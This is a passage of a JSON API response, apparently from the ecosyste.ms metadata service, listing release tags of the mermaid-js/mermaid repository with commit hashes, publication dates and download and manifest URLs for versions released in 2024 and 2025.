ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_